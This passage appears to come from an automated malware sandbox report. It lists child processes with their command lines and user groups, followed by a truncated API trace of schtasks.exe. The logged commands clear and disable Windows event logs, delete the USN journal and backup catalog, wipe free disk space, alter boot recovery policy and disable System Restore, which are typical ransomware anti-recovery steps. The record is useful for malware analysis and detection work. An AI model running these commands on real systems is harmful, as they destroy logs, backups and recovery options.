"C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 44 os_tid = 0x12a4 Thread: id = 45 os_tid = 0x129c Thread: id = 46 os_tid = 0x9bc Thread: id = 47 os_tid = 0x7ec Thread: id = 48 os_tid = 0x770 Thread: id = 49 os_tid = 0x7d8 Thread: id = 50 os_tid = 0x698 Thread: id = 51 os_tid = 0x690 Thread: id = 52 os_tid = 0x5fc Thread: id = 53 os_tid = 0x5f8 Thread: id = 54 os_tid = 0x5f4 Thread: id = 55 os_tid = 0x5b4 Process: id = "4" image_name = "fsutil.exe" filename = "c:\\windows\\system32\\fsutil.exe" page_root = "0x7c38c000" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\fsutil.exe\" usn deletejournal /D C:" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x1164 Thread: id = 123 os_tid = 0x518 Process: id = "5" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x5c02e000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\wevtutil.exe\" cl Security" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 62 os_tid = 0x13e0 Thread: id = 119 os_tid = 0x368 Process: id = "6" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x623b0000" os_pid = "0x12cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\wevtutil.exe\" cl System" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0x11fc Thread: id = 117 os_tid = 0xd08 Process: id = "7" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x5c02f000" os_pid = "0x12b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\bcdedit.exe\" /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 61 os_tid = 0x13f0 Thread: id = 115 os_tid = 0x56c Process: id = "8" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x5e140000" os_pid = "0x1208" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\wbadmin.exe\" delete catalog -quiet" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 63 os_tid = 0x13c0 Thread: id = 120 os_tid = 0x480 Thread: id = 132 os_tid = 0xf20 Thread: id = 142 os_tid = 0x6dc Thread: id = 143 os_tid = 0xd4c Process: id = "9" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x734e000" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\wevtutil.exe\" sl Security /e:false" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 64 os_tid = 0x119c Thread: id = 124 os_tid = 0xff8 Process: id = "10" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x77783000" os_pid = "0x126c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa50" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0xe70 Thread: id = 73 os_tid = 0x510 Thread: id = 91 os_tid = 0xd90 Thread: id = 105 os_tid = 0x3cc Thread: id = 111 os_tid = 0xc74 Process: id = "11" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x8253000" os_pid = "0x1204" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\wevtutil.exe\" cl Application" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0x11a0 Thread: id = 128 os_tid = 0x10d8 Process: id = "12" image_name = "cipher.exe" filename = "c:\\windows\\syswow64\\cipher.exe" page_root = "0x2bd4000" os_pid = "0x1198" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\cipher.exe\" /w:C:" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 67 os_tid = 0x12b4 Thread: id = 138 os_tid = 0x860 Thread: id = 139 os_tid = 0x7b8 Process: id = "13" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1068f000" os_pid = "0x12c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xbf8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0x12d0 Thread: id = 76 os_tid = 0xd04 Thread: id = 86 os_tid = 0x1138 Thread: id = 106 os_tid = 0x310 Thread: id = 112 os_tid = 0xe04 Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5f170000" os_pid = "0x12b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x12cc" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 69 os_tid = 0x12c8 Thread: id = 77 os_tid = 0x980 Thread: id = 87 os_tid = 0x113c Thread: id = 101 os_tid = 0x1108 Thread: id = 107 os_tid = 0x24c Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5b36e000" os_pid = "0x12bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x12b0" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0x1294 Thread: id = 78 os_tid = 0x8f0 Thread: id = 88 os_tid = 0x1140 Thread: id = 100 os_tid = 0x1104 Thread: id = 102 os_tid = 0x110c Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x10aab000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe98" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 71 os_tid = 0xff4 Thread: id = 79 os_tid = 0x85c Thread: id = 89 os_tid = 0x1144 Thread: id = 103 os_tid = 0x1114 Thread: id = 109 os_tid = 0x5c8 Process: id = "17" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x17f7f000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x1208" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0x4f0 Thread: id = 80 os_tid = 0xdd8 Thread: id = 90 os_tid = 0xc18 Thread: id = 104 os_tid = 0x55c Thread: id = 110 os_tid = 0x804 Process: id = "18" image_name = "schtasks.exe" filename = "c:\\windows\\system32\\schtasks.exe" page_root = "0x210d7000" os_pid = "0x36c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0x514 [0106.671] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff78ab00000 [0106.671] __set_app_type (_Type=0x1) [0106.671] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff78ab22910) returned 0x0 [0106.671] __wgetmainargs (in: _Argc=0x7ff78ab35ff8, _Argv=0x7ff78ab36000, _Env=0x7ff78ab36008, _DoWildCard=0, _StartInfo=0x7ff78ab36014 | out: _Argc=0x7ff78ab35ff8, _Argv=0x7ff78ab36000, _Env=0x7ff78ab36008) returned 0 [0106.672] _onexit (_Func=0x7ff78ab25ba0) returned 0x7ff78ab25ba0 [0106.672] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.672] CsrIdentifyAlertableThread () returned 0x0 [0106.672] GetProcessHeap () returned 0x1523d3d0000 [0106.672] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3dbbe0 [0106.672] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0106.672] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018 [0106.672] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b [0106.672] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b [0106.672] RtlVerifyVersionInfo (VersionInfo=0x1b4a07f540, TypeMask=0x3, ConditionMask=0x800000000001801b) returned 0x0 [0106.672] GetProcessHeap () returned 0x1523d3d0000 [0106.672] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df1e0 [0106.673] lstrlenW (lpString="") returned 0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x2) returned 0x1523d3ddbf0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d88f0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df320 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8920 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8770 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8980 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8a40 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df2a0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8a70 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8740 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8860 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d87a0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df1a0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d87d0 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8800 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3d8890 [0106.673] GetProcessHeap () returned 0x1523d3d0000 [0106.673] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfce0 [0106.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.562] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.562] GetProcessHeap () returned 0x1523d3d0000 [0107.562] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfdd0 [0107.562] GetProcessHeap () returned 0x1523d3d0000 [0107.562] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfd40 [0107.562] GetProcessHeap () returned 0x1523d3d0000 [0107.562] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3e00d0 [0107.562] GetProcessHeap () returned 0x1523d3d0000 [0107.562] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dff50 [0107.562] GetProcessHeap () returned 0x1523d3d0000 [0107.562] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3e0070 [0107.563] GetProcessHeap () returned 0x1523d3d0000 [0107.563] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df8e0 [0107.563] _memicmp (_Buf1=0x1523d3df8e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.563] GetProcessHeap () returned 0x1523d3d0000 [0107.563] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x208) returned 0x1523d3e09f0 [0107.563] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1523d3e09f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20 [0107.563] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\System32\\schtasks.exe", lpdwHandle=0x1b4a07f698 | out: lpdwHandle=0x1b4a07f698) returned 0x75c [0107.564] GetProcessHeap () returned 0x1523d3d0000 [0107.564] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x766) returned 0x1523d3e1910 [0107.564] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\System32\\schtasks.exe", dwHandle=0x0, dwLen=0x766, lpData=0x1523d3e1910 | out: lpData=0x1523d3e1910) returned 1 [0107.565] VerQueryValueW (in: pBlock=0x1523d3e1910, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b4a07f630, puLen=0x1b4a07f690 | out: lplpBuffer=0x1b4a07f630*=0x1523d3e1cb8, puLen=0x1b4a07f690) returned 1 [0107.566] _memicmp (_Buf1=0x1523d3df8e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.566] _vsnwprintf (in: _Buffer=0x1523d3e09f0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x1b4a07f608 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0107.566] VerQueryValueW (in: pBlock=0x1523d3e1910, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x1b4a07f620, puLen=0x1b4a07f688 | out: lplpBuffer=0x1b4a07f620*=0x1523d3e1ae8, puLen=0x1b4a07f688) returned 1 [0107.566] lstrlenW (lpString="schtasks.exe") returned 12 [0107.566] lstrlenW (lpString="schtasks.exe") returned 12 [0107.566] lstrlenW (lpString=".EXE") returned 4 [0107.566] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0107.567] lstrlenW (lpString="schtasks.exe") returned 12 [0107.567] lstrlenW (lpString=".EXE") returned 4 [0107.567] _memicmp (_Buf1=0x1523d3df8e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.567] lstrlenW (lpString="schtasks") returned 8 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfda0 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfe60 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfb30 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3e0100 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df900 [0107.567] _memicmp (_Buf1=0x1523d3df900, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0xa0) returned 0x1523d3d5100 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfa70 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfe00 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3dfb90 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df3e0 [0107.567] _memicmp (_Buf1=0x1523d3df3e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x200) returned 0x1523d3e2bd0 [0107.567] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1523d3e2bd0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0107.567] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0107.567] GetProcessHeap () returned 0x1523d3d0000 [0107.567] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x30) returned 0x1523d3d4cb0 [0107.567] _vsnwprintf (in: _Buffer=0x1523d3d5100, _BufferCount=0x4f, 